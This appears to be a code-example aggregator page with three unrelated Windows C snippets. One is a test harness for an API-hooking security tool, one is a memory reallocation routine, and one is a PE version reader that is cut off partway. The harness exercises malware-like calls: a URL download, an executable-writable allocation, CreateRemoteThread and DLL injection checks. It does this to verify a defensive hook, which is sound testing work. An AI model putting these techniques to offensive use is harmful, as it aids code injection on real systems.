示例13: WinMain
int CALLBACK WinMain(HINSTANCE,HINSTANCE,LPSTR,int){
quiet = strstr(GetCommandLineA(), "quiet") != NULL;
//Change directory to binary directory
char filename[MAX_PATH];
DWORD size = GetModuleFileNameA(NULL, filename, sizeof(filename));
for(size -= 1; filename[size] != '\\' && size != 0; size--)
filename[size] = 0;
SetCurrentDirectoryA(filename);
if(ask("Update signatures?"))
system("config.exe update");
if(ask("Manually load library?"))
#ifdef _M_X64
if(LoadLibraryA("apihook64.dll") == NULL)
#else
if(LoadLibraryA("apihook.dll") == NULL)
#endif
MessageBoxA(NULL,"Load failed!","Hook Tester",0);
//ALLOW TEST
clock_t one=clock();
if(ask("Test starting. SleepEx 1000..."))
SleepEx(1000, FALSE);
if(quiet && clock() - one < CLOCKS_PER_SEC / 2)
error("SleepEx(1000, 0) exited early");
//BLOCK AND AGGREGATION TEST
one=clock();
if(ask("SleepEx 1001 quad"))
for(int i = 0; i < 4; i++)
SleepEx(1001, FALSE);
if(ask("SleepEx 1001 quad"))
for(int i = 0; i < 4; i++)
SleepEx(1001, FALSE);
if(quiet && clock() - one > CLOCKS_PER_SEC * 5)
error("SleepEx(1001, 0) was not blocked");
//URLDOWNLOADTOFILEW TEST
//Test LoadLibrary, GetProcAddress, WC string regex
DeleteFileA("deleteme.txt");
URLDownloadToFileWFunc URLDownloadToFileW = (URLDownloadToFileWFunc)
GetProcAddress(LoadLibraryA("urlmon"), "URLDownloadToFileW");
if(ask("URLDownloadToFileW http://www.yahoo.com/"))
if(URLDownloadToFileW(NULL, L"http://www.yahoo.com/", L"deleteme.txt", 0, NULL) != (HANDLE)73)
error("URLDOWNLOADTOFILEW wrong return value");
//RECV TEST
//Test LoadLibrary, GetProcAddress, Pointer, and Integer range
recvfunc myrecv = (recvfunc)GetProcAddress(LoadLibraryA("ws2_32.dll"), "recv");
PVOID rwx = VirtualAlloc(NULL, 1021, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(ask("winsock recv"))
if(myrecv(0, (char*)rwx, 1021, 0) != 0)
error("Ws2_32 recv did not return the correct value");
//INJECT TEST - ensures library is loaded into all new processes
STARTUPINFOA start;
PROCESS_INFORMATION proc;
memset(&start,0,sizeof(start));
memset(&proc,0,sizeof(proc));
start.cb = sizeof(start);
char cmdline[100];
lstrcpyA(cmdline,"cmd.exe");
if(ask("Start cmd")){
CreateProcessA(NULL,cmdline,NULL,NULL,0,0,NULL,NULL,&start,&proc);
HMODULE hmods[100];
DWORD bytes = sizeof(hmods);
CHAR modname[MAX_PATH];
bool found = false;
if(EnumProcessModules(proc.hProcess, hmods, sizeof(hmods), &bytes))
for(int i = 0; i < (bytes / sizeof(HMODULE)); i++)
if(GetModuleFileNameExA(proc.hProcess, hmods[i], modname, MAX_PATH))
if(strstr(modname, "apihook") != NULL)
found = true;
if(found == false)
error("Process injection failed!");
TerminateProcess(proc.hProcess, 0);
}
//TEST NOT
if(ask("Non-remote CreateRemoteThread")){
WaitForSingleObject(CreateRemoteThread(GetCurrentProcess(),NULL,0,&ThreadProc,NULL,0,NULL), 500);
if(thread != true)
error("Thread did not run!");
}
//Test killproc with sleepEx 1002
if(ask("Read PE")){
GetModuleFileNameA(NULL, filename, sizeof(filename));
HANDLE h = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, NULL, NULL);
char readbuf[1000];
DWORD dontcare;
ReadFile(h,readbuf,sizeof(readbuf),&dontcare,NULL);
CloseHandle(h);
}
error("Read PE Kill process failed!");
}示例14: HeapCreate
void *globalrealloc(void *oldp,size_t newsize)
{
#if 0
void *p;
// Initialize heap
if (!hHeap)
{ hHeap = HeapCreate(0,0x10000,0);
if (!hHeap)
os_error();
}
newsize = (newsize + 3) & ~3L; // round up to dwords
if (newsize == 0)
{
if (oldp && HeapFree(hHeap,0,oldp) == FALSE)
os_error();
p = NULL;
}
else if (!oldp)
{
p = newsize ? HeapAlloc(hHeap,0,newsize) : NULL;
}
else
p = HeapReAlloc(hHeap,0,oldp,newsize);
#elif 1
MEMORY_BASIC_INFORMATION query;
void *p;
BOOL bSuccess;
if (!oldp)
p = VirtualAlloc (NULL, newsize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
else
{
VirtualQuery (oldp, &query, sizeof(query));
if (!newsize)
{
p = NULL;
goto L1;
}
else
{ newsize = (newsize + 0xFFFF) & ~0xFFFFL;
if (query.RegionSize >= newsize)
p = oldp;
else
{ p = VirtualAlloc(NULL,newsize,MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);
if (p)
memcpy(p,oldp,query.RegionSize);
L1:
bSuccess = VirtualFree(oldp,query.RegionSize,MEM_DECOMMIT);
if (bSuccess)
bSuccess = VirtualFree(oldp,0,MEM_RELEASE);
if (!bSuccess)
os_error();
}
}
}
#else
void *p;
if (!oldp)
p = (void *)GlobalAlloc (0, newsize);
else if (!newsize)
{ GlobalFree(oldp);
p = NULL;
}
else
p = (void *)GlobalReAlloc(oldp,newsize,0);
#endif
dbg_printf("globalrealloc(oldp = %p, size = x%x) = %p\n",oldp,newsize,p);
return p;
}示例15: MEXP
MEXP(int) getExeInfo(const char* file_name, char* exe_info,
size_t exe_info_size, uint32_t* version, int platform)
{
const char* base = (char*) 0;
unsigned long file_size;
FILE* f = (FILE*) 0;
int ret;
#ifdef MOS_WINDOWS
HANDLE hFile;
FILETIME ft;
SYSTEMTIME st;
LPBYTE buf;
VS_FIXEDFILEINFO* ffi;
DWORD infoSize, bytesRead;
#else
cm_pe_t pe;
cm_pe_resdir_t* root;
cm_pe_resdir_t* dir;
cm_pe_version_t ffi;
size_t i;
struct stat st;
struct tm* time;
#endif
if (!file_name || !exe_info || !exe_info_size || !version)
return 0;
base = get_basename(file_name);
switch (platform) {
case BNCSUTIL_PLATFORM_X86:
#ifdef MOS_WINDOWS
infoSize = GetFileVersionInfoSize(file_name, &bytesRead);
if (infoSize == 0)
return 0;
buf = (LPBYTE) VirtualAlloc(NULL, infoSize, MEM_COMMIT,
PAGE_READWRITE);
if (buf == NULL)
return 0;
if (GetFileVersionInfo(file_name, NULL, infoSize, buf) == FALSE)
return 0;
if (!VerQueryValue(buf, "\\", (LPVOID*) &ffi, (PUINT) &infoSize))
return 0;
*version =
((HIWORD(ffi->dwProductVersionMS) & 0xFF) << 24) |
((LOWORD(ffi->dwProductVersionMS) & 0xFF) << 16) |
((HIWORD(ffi->dwProductVersionLS) & 0xFF) << 8) |
(LOWORD(ffi->dwProductVersionLS) & 0xFF);
#if DEBUG
bncsutil_debug_message_a("%s version = %d.%d.%d.%d (0x%08X)",
base, (HIWORD(ffi->dwProductVersionMS) & 0xFF),
(LOWORD(ffi->dwProductVersionMS) & 0xFF),
(HIWORD(ffi->dwProductVersionLS) & 0xFF),
(LOWORD(ffi->dwProductVersionLS) & 0xFF),
*version);
#endif
VirtualFree(buf, 0lu, MEM_RELEASE);
#else
pe = cm_pe_load(file_name);
if (!pe)
return 0;
root = cm_pe_load_resources(pe);
if (!root) {
cm_pe_unload(pe);
return 0;
}
for (i = 0; i < root->subdir_count; i++) {
dir = (root->subdirs + i);
if (dir->name == 16) {
if (!cm_pe_fixed_version(pe, dir->subdirs->resources,
&ffi))
{
cm_pe_unload_resources(root);
cm_pe_unload(pe);
return 0;
}
break;
}
}
*version =
((HIWORD(ffi.dwProductVersionMS) & 0xFF) << 24) |
((LOWORD(ffi.dwProductVersionMS) & 0xFF) << 16) |
((HIWORD(ffi.dwProductVersionLS) & 0xFF) << 8) |
(LOWORD(ffi.dwProductVersionLS) & 0xFF);
#if DEBUG
bncsutil_debug_message_a("%s version = %d.%d.%d.%d (0x%08X)",
base, (HIWORD(ffi.dwProductVersionMS) & 0xFF),
(LOWORD(ffi.dwProductVersionMS) & 0xFF),
(HIWORD(ffi.dwProductVersionLS) & 0xFF),
(LOWORD(ffi.dwProductVersionLS) & 0xFF),
*version);
#endif
cm_pe_unload_resources(root);
cm_pe_unload(pe);
#endif
break;
case BNCSUTIL_PLATFORM_MAC:
//.........这里部分代码省略.........